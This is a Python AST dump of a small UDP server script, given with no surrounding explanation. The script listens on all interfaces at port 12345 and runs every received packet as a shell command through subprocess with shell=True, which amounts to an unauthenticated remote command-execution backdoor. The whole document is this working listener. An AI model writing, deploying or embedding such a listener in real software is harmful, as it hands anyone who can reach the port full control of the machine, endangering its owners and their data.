Module(
    body=[
        Import(
            names=[
                alias(name='socket')]),
        Import(
            names=[
                alias(name='subprocess')]),
        FunctionDef(
            name='handle_packet',
            args=arguments(
                posonlyargs=[],
                args=[
                    arg(arg='data')],
                kwonlyargs=[],
                kw_defaults=[],
                defaults=[]),
            body=[
                Try(
                    body=[
                        Assign(
                            targets=[
                                Name(id='result', ctx=Store())],
                            value=Call(
                                func=Attribute(
                                    value=Name(id='subprocess', ctx=Load()),
                                    attr='run',
                                    ctx=Load()),
                                args=[
                                    Name(id='data', ctx=Load())],
                                keywords=[
                                    keyword(
                                        arg='shell',
                                        value=Constant(value=True)),
                                    keyword(
                                        arg='check',
                                        value=Constant(value=True)),
                                    keyword(
                                        arg='capture_output',
                                        value=Constant(value=True))])),
                        Expr(
                            value=Call(
                                func=Name(id='print', ctx=Load()),
                                args=[
                                    Call(
                                        func=Attribute(
                                            value=Attribute(
                                                value=Name(id='result', ctx=Load()),
                                                attr='stdout',
                                                ctx=Load()),
                                            attr='decode',
                                            ctx=Load()),
                                        args=[],
                                        keywords=[])],
                                keywords=[]))],
                    handlers=[
                        ExceptHandler(
                            type=Attribute(
                                value=Name(id='subprocess', ctx=Load()),
                                attr='CalledProcessError',
                                ctx=Load()),
                            name='e',
                            body=[
                                Expr(
                                    value=Call(
                                        func=Name(id='print', ctx=Load()),
                                        args=[
                                            JoinedStr(
                                                values=[
                                                    Constant(value='Error executing command: '),
                                                    FormattedValue(
                                                        value=Name(id='e', ctx=Load()),
                                                        conversion=-1)])],
                                        keywords=[]))])],
                    orelse=[],
                    finalbody=[])],
            decorator_list=[]),
        FunctionDef(
            name='start_server',
            args=arguments(
                posonlyargs=[],
                args=[],
                kwonlyargs=[],
                kw_defaults=[],
                defaults=[]),
            body=[
                Assign(
                    targets=[
                        Name(id='server_socket', ctx=Store())],
                    value=Call(
                        func=Attribute(
                            value=Name(id='socket', ctx=Load()),
                            attr='socket',
                            ctx=Load()),
                        args=[
                            Attribute(
                                value=Name(id='socket', ctx=Load()),
                                attr='AF_INET',
                                ctx=Load()),
                            Attribute(
                                value=Name(id='socket', ctx=Load()),
                                attr='SOCK_DGRAM',
                                ctx=Load())],
                        keywords=[])),
                Expr(
                    value=Call(
                        func=Attribute(
                            value=Name(id='server_socket', ctx=Load()),
                            attr='bind',
                            ctx=Load()),
                        args=[
                            Tuple(
                                elts=[
                                    Constant(value='0.0.0.0'),
                                    Constant(value=12345)],
                                ctx=Load())],
                        keywords=[])),
                While(
                    test=Constant(value=True),
                    body=[
                        Assign(
                            targets=[
                                Tuple(
                                    elts=[
                                        Name(id='data', ctx=Store()),
                                        Name(id='addr', ctx=Store())],
                                    ctx=Store())],
                            value=Call(
                                func=Attribute(
                                    value=Name(id='server_socket', ctx=Load()),
                                    attr='recvfrom',
                                    ctx=Load()),
                                args=[
                                    Constant(value=1024)],
                                keywords=[])),
                        Expr(
                            value=Call(
                                func=Name(id='handle_packet', ctx=Load()),
                                args=[
                                    Call(
                                        func=Attribute(
                                            value=Name(id='data', ctx=Load()),
                                            attr='decode',
                                            ctx=Load()),
                                        args=[],
                                        keywords=[])],
                                keywords=[]))],
                    orelse=[])],
            decorator_list=[]),
        If(
            test=Compare(
                left=Name(id='__name__', ctx=Load()),
                ops=[
                    Eq()],
                comparators=[
                    Constant(value='__main__')]),
            body=[
                Expr(
                    value=Call(
                        func=Name(id='start_server', ctx=Load()),
                        args=[],
                        keywords=[]))],
            orelse=[])],
    type_ignores=[])